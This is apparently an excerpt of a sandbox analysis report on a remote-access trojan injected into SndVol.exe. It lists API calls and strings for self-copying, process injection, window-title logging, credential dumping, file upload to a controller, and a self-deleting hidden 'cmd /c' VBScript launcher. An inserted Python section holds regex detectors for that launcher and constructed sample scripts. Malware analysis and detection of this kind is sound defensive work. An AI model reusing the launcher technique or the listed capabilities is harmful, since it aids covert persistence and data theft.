                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                        • API String ID: 1646373207-2877372328
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 2913CE42
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,291A50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 2913CE5B
                                                                        • CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000,00000000,00000000,00000000,?,291A50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 2913CF0B
                                                                        • _wcslen.LIBCMT ref: 2913CF21
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 2913CFA9
                                                                        • CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000), ref: 2913CFBF
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 2913CFFE
                                                                        • _wcslen.LIBCMT ref: 2913D001
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 2913D018
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,291A50E4,0000000E), ref: 2913D068
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,29196478,29196478,00000001), ref: 2913D086
                                                                        • ExitProcess.KERNEL32 ref: 2913D09D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                        • String ID: 6$C:\Windows\SysWOW64\SndVol.exe$del$open
                                                                        • API String ID: 1579085052-1404393845
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?), ref: 2914C0C7
                                                                        • _memcmp.LIBVCRUNTIME ref: 2914C0DF
                                                                        • lstrlenW.KERNEL32(?), ref: 2914C0F8
                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 2914C133
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 2914C146
                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 2914C18A
                                                                        • lstrcmpW.KERNEL32(?,?), ref: 2914C1A5
                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 2914C1BD
                                                                        • _wcslen.LIBCMT ref: 2914C1CC
                                                                        • FindVolumeClose.KERNEL32(?), ref: 2914C1EC
                                                                        • GetLastError.KERNEL32 ref: 2914C204
                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 2914C231
                                                                        • lstrcatW.KERNEL32(?,?), ref: 2914C24A
                                                                        • lstrcpyW.KERNEL32(?,?), ref: 2914C259
                                                                        • GetLastError.KERNEL32 ref: 2914C261
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                        • String ID: ?
                                                                        • API String ID: 3941738427-1684325040
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: _free$EnvironmentVariable$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 3899193279-0
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 29144E10
                                                                        • LoadLibraryA.KERNEL32(?), ref: 29144E52
                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 29144E72
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 29144E79
                                                                        • LoadLibraryA.KERNEL32(?), ref: 29144EB1
                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 29144EC3
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 29144ECA
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 29144ED9
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 29144EF0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                        • API String ID: 2490988753-744132762
                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 2914C742
                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 2914C786
                                                                        • RegCloseKey.ADVAPI32(?), ref: 2914CA50
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                        • API String ID: 1332880857-3714951968
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: _free$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 565560161-0
                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 2914D66B
                                                                        • GetCursorPos.USER32(?), ref: 2914D67A
                                                                        • SetForegroundWindow.USER32(?), ref: 2914D683
                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 2914D69D
                                                                        • Shell_NotifyIconA.SHELL32(00000002,291A4B48), ref: 2914D6EE
                                                                        • ExitProcess.KERNEL32 ref: 2914D6F6
                                                                        • CreatePopupMenu.USER32 ref: 2914D6FC
                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 2914D711
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                        • String ID: Close
                                                                        • API String ID: 1657328048-3535843008
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: _free$Info
                                                                        • String ID:
                                                                        • API String ID: 2509303402-0
                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 2918138A
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 2918059F
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805B1
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805C3
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805D5
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805E7
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805F9
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 2918060B
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 2918061D
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 2918062F
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 29180641
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 29180653
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 29180665
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 29180677
                                                                        • _free.LIBCMT ref: 2918137F
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 291813A1
                                                                        • _free.LIBCMT ref: 291813B6
                                                                        • _free.LIBCMT ref: 291813C1
                                                                        • _free.LIBCMT ref: 291813E3
                                                                        • _free.LIBCMT ref: 291813F6
                                                                        • _free.LIBCMT ref: 29181404
                                                                        • _free.LIBCMT ref: 2918140F
                                                                        • _free.LIBCMT ref: 29181447
                                                                        • _free.LIBCMT ref: 2918144E
                                                                        • _free.LIBCMT ref: 2918146B
                                                                        • _free.LIBCMT ref: 29181483
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 0447209C
                                                                        • ___free_lconv_mon.LIBCMT ref: 044720A7
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 044712BC
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 044712CE
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 044712E0
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 044712F2
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471304
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471316
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471328
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 0447133A
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 0447134C
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 0447135E
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471370
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471382
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471394
                                                                        • _free.LIBCMT ref: 044720BE
                                                                        • _free.LIBCMT ref: 044720D3
                                                                        • _free.LIBCMT ref: 044720DE
                                                                        • _free.LIBCMT ref: 04472100
                                                                        • _free.LIBCMT ref: 04472113
                                                                        • _free.LIBCMT ref: 04472121
                                                                        • _free.LIBCMT ref: 0447212C
                                                                        • _free.LIBCMT ref: 04472164
                                                                        • _free.LIBCMT ref: 0447216B
                                                                        • _free.LIBCMT ref: 04472188
                                                                        • _free.LIBCMT ref: 044721A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: _free$___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 3658870901-0
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 29138D1E
                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 29138D56
                                                                        • __aulldiv.LIBCMT ref: 29138D88
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 29138EAB
                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 29138EC6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29138F9F
                                                                        • CloseHandle.KERNEL32(00000000,00000052), ref: 29138FE9
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29139037
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                        • API String ID: 3086580692-2596673759
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 29142B08
                                                                          • Part of subcall function 2914BA09: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,29196478,2913D248,.vbs,?,?,?,?,?,291A52F0), ref: 2914BA30
                                                                          • Part of subcall function 291485A3: CloseHandle.KERNEL32(291340F5,?,?,291340F5,29195E84), ref: 291485B9
                                                                          • Part of subcall function 291485A3: CloseHandle.KERNEL32(29195E84,?,?,291340F5,29195E84), ref: 291485C2
                                                                        • Sleep.KERNEL32(0000000A,29195E84), ref: 29142C5A
                                                                        • Sleep.KERNEL32(0000000A,29195E84,29195E84), ref: 29142CFC
                                                                        • Sleep.KERNEL32(0000000A,29195E84,29195E84,29195E84), ref: 29142D9E
                                                                        • DeleteFileW.KERNEL32(00000000,29195E84,29195E84,29195E84), ref: 29142E00
                                                                        • DeleteFileW.KERNEL32(00000000,29195E84,29195E84,29195E84), ref: 29142E37
                                                                        • DeleteFileW.KERNEL32(00000000,29195E84,29195E84,29195E84), ref: 29142E73
                                                                        • Sleep.KERNEL32(000001F4,29195E84,29195E84,29195E84), ref: 29142E8D
                                                                        • Sleep.KERNEL32(00000064), ref: 29142ECF
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                        • String ID: /stext "
                                                                        • API String ID: 1223786279-3856184850
                                                                        APIs
                                                                          • Part of subcall function 29185929: CreateFileW.KERNEL32(00000000,00000000,?,29185D04,?,?,00000000,?,29185D04,00000000,0000000C), ref: 29185946
                                                                        • GetLastError.KERNEL32 ref: 29185D6F
                                                                        • __dosmaperr.LIBCMT ref: 29185D76
                                                                        • GetFileType.KERNEL32(00000000), ref: 29185D82
                                                                        • GetLastError.KERNEL32 ref: 29185D8C
                                                                        • __dosmaperr.LIBCMT ref: 29185D95
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29185DB5
                                                                        • CloseHandle.KERNEL32(?), ref: 29185EFF
                                                                        • GetLastError.KERNEL32 ref: 29185F31
                                                                        • __dosmaperr.LIBCMT ref: 29185F38
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID: H
                                                                        • API String ID: 4237864984-2852464175
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,291A50E4,?,291A5338), ref: 2913F4C9
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,291A5338), ref: 2913F4F4
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 2913F510
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 2913F58F
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,291A5338), ref: 2913F59E
                                                                          • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 2914C286
                                                                          • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 2914C299
                                                                        • CloseHandle.KERNEL32(00000000,?,291A5338), ref: 2913F6A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                        • API String ID: 3756808967-1743721670
                                                                        • Opcode ID: 13646a7a3651fca052dc9ac162c8826c559e201f5dcc24390b813f74caeaa09f
                                                                        • Instruction ID: b10f894ce3fc2fb78d5bb7451b28a931e19b55ec07f2c6c069d6df29c5e1902b
                                                                        • Opcode Fuzzy Hash: 13646a7a3651fca052dc9ac162c8826c559e201f5dcc24390b813f74caeaa09f
                                                                        • Instruction Fuzzy Hash: 1B713570518341ABE794DB22DC549DEB7B87FA0248FC0992DE58643151EF34AB0FCB56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 65535$udp
                                                                        • API String ID: 0-1267037602
                                                                        • Opcode ID: e4166902259f7d5b14a89061ea93b8b99a0b59111d2f4500b82b4b32c74d6a17
                                                                        • Instruction ID: 20f9468c3f06354815a679a0b4da96e4444ad4e08f02d53f279e9dda2c0f17ef
                                                                        • Opcode Fuzzy Hash: e4166902259f7d5b14a89061ea93b8b99a0b59111d2f4500b82b4b32c74d6a17
                                                                        • Instruction Fuzzy Hash: 7F510771E45381ABE3049F17DD06BA677E8AFAC78CF042429FA9C972D0D728CB42C651
                                                                        APIs
                                                                        • __Init_thread_footer.LIBCMT ref: 2913AD73
                                                                        • Sleep.KERNEL32(000001F4), ref: 2913AD7E
                                                                        • GetForegroundWindow.USER32 ref: 2913AD84
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 2913AD8D
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 2913ADC1
                                                                        • Sleep.KERNEL32(000003E8), ref: 2913AE8F
                                                                          • Part of subcall function 2913A671: SetEvent.KERNEL32(?,?,00000000,2913B245,00000000), ref: 2913A69D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                        • API String ID: 911427763-3954389425
                                                                        • Opcode ID: 401a664b05727a7b2ae3833d89060a541161170af2e0ebd0cfa51c944d62a473
                                                                        • Instruction ID: 5bfc78eb71f8ac178cc8f393147149b735b2844bb9db27010ba4db6b3060f386
                                                                        • Opcode Fuzzy Hash: 401a664b05727a7b2ae3833d89060a541161170af2e0ebd0cfa51c944d62a473
                                                                        • Instruction Fuzzy Hash: 395117316042807BD348EB73CC94A6E77B9AF6424CFC0952DE456921D4EF249F07C79A
                                                                        APIs
                                                                          • Part of subcall function 2914288B: TerminateProcess.KERNEL32(00000000,pth_unenc,2913F903), ref: 2914289B
                                                                          • Part of subcall function 2914288B: WaitForSingleObject.KERNEL32(000000FF), ref: 291428AE
                                                                          • Part of subcall function 29143733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,291A52F0), ref: 2914374F
                                                                          • Part of subcall function 29143733: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 29143768
                                                                          • Part of subcall function 29143733: RegCloseKey.ADVAPI32(00000000), ref: 29143773
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 2913D894
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,29196478,29196478,00000000), ref: 2913D9F3
                                                                        • ExitProcess.KERNEL32 ref: 2913D9FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                        • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                        • API String ID: 1913171305-2411266221
                                                                        • Opcode ID: a32bdc440b195bea0749c70ba8cdc51b21f335299da77d56ed54ca85b03c9f3c
                                                                        • Instruction ID: 55d7ef205d7c5db8d4b11b637b4a035aa5e28bc086bdfe84f5757f8a135036de
                                                                        • Opcode Fuzzy Hash: a32bdc440b195bea0749c70ba8cdc51b21f335299da77d56ed54ca85b03c9f3c
                                                                        • Instruction Fuzzy Hash: 09413231D100187AEB59E766DC94DFEB77DAF74208F809169E006A3094FF206F4BCA98
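The string fragments in this block (`CreateObject("WScript.Shell").Run "cmd /c ""`, `""", 0`, `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)`, `.vbs`, `Temp`, `exepath`) are the pieces of a launcher script that the function assembles, writes under the temp directory, starts through ShellExecuteW with the `open` verb and then exits on via ExitProcess: the script runs a command in a hidden console (the trailing `0` is the WshShell.Run window style) and removes itself. As an added detection example, not code from the report or from the sample, the following Python flags VBScript bodies that carry both behaviours. The sample scripts are constructed from those fragments, the executable paths inside them are assumptions, and matching is case-insensitive and tolerant of variable indirection because VBScript is case-insensitive and a literal string match on the fragments above would be trivial to evade.

```python
import re
from pathlib import Path
from typing import Dict, List, Optional

# Two building blocks of the self-deleting launcher. Matching is case-insensitive because
# VBScript is; whitespace is allowed wherever the language allows it.
SELF_DELETE = re.compile(r"\.DeleteFile\s*\(?\s*WScript\.ScriptFullName\b", re.IGNORECASE)
# .Run "cmd /c ""<cmd>""", 0   -> a doubled quote is VBScript's escaped quote inside a string
# literal; the trailing 0 is the WshShell.Run window style that hides the console.
HIDDEN_CMD_RUN = re.compile(
    r'\.Run\s+"cmd\s*/c\s+(?P<cmd>(?:""|[^"])*)"\s*,\s*0\b', re.IGNORECASE)


def scan_vbs(text: str) -> Dict[str, object]:
    """Report which launcher indicators a VBScript body contains and the command it runs."""
    indicators: List[str] = []
    launched: Optional[str] = None
    m = HIDDEN_CMD_RUN.search(text)
    if m:
        indicators.append("hidden_cmd_run")
        launched = m["cmd"].replace('""', '"')  # undo VBScript quote escaping
    if SELF_DELETE.search(text):
        indicators.append("self_delete")
    return {"indicators": indicators, "launched_command": launched,
            "suspicious": len(indicators) == 2}


def scan_directory(directory: str) -> List[str]:
    """Paths of *.vbs files below `directory` (e.g. the user's %TEMP%) that carry both indicators."""
    flagged = []
    for p in Path(directory).rglob("*.vbs"):
        try:
            if scan_vbs(p.read_text(errors="ignore"))["suspicious"]:
                flagged.append(str(p))
        except OSError:
            pass
    return flagged


# Constructed samples. The first follows the fragments in the listing; the path is an
# assumption, the real script is built from the "Temp" and "exepath" values at runtime.
MALICIOUS_VBS = r'''CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\victim\AppData\Local\Temp\update.exe""", 0
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
'''
# Same technique with variable indirection and different casing (constructed).
OBFUSCATED_VBS = r'''set sh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
sh.run "CMD /C ""C:\Users\victim\AppData\Roaming\svc.exe"" -s", 0
fso.deletefile wscript.scriptfullname
'''
# A maintenance script that runs its command visibly and does not remove itself (constructed).
BENIGN_VBS = r'''Set sh = CreateObject("WScript.Shell")
sh.Run "cmd /c ""C:\Tools\backup.cmd""", 1, True
'''
```

`scan_vbs` returns the recovered command line so an analyst can pivot straight to the dropped executable; `scan_directory` is the form you would point at a user's temp directory during triage. A script that only matches one of the two indicators is reported but not marked suspicious, which keeps ordinary hidden-window admin scripts out of the alert.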
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A912
                                                                        • GetLastError.KERNEL32(?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A91F
                                                                        • __dosmaperr.LIBCMT ref: 2916A926
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A952
                                                                        • GetLastError.KERNEL32(?,?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A95C
                                                                        • __dosmaperr.LIBCMT ref: 2916A963
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,29131D55,?), ref: 2916A9A6
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A9B0
                                                                        • __dosmaperr.LIBCMT ref: 2916A9B7
                                                                        • _free.LIBCMT ref: 2916A9C3
                                                                        • _free.LIBCMT ref: 2916A9CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                        • String ID:
                                                                        • API String ID: 2441525078-0
                                                                        • Opcode ID: 5ced71b9ea1d760102d7d7fa1ce1cc9665d78c77d837c59238bc9d683662edb4
                                                                        • Instruction ID: fdfa17333e37db4b4731c288ca5ab49a8e8628b70e72dd0dd28a754901713ebc
                                                                        • Opcode Fuzzy Hash: 5ced71b9ea1d760102d7d7fa1ce1cc9665d78c77d837c59238bc9d683662edb4
                                                                        • Instruction Fuzzy Hash: F031B372D0524ABBDF05AFA6CC48DDE3B7CAF02368B214159F910561A0DB348BA2D7A0
                                                                        APIs
                                                                        • SetEvent.KERNEL32(?,?), ref: 291354BF
                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 2913556F
                                                                        • TranslateMessage.USER32(?), ref: 2913557E
                                                                        • DispatchMessageA.USER32(?), ref: 29135589
                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,291A4F78), ref: 29135641
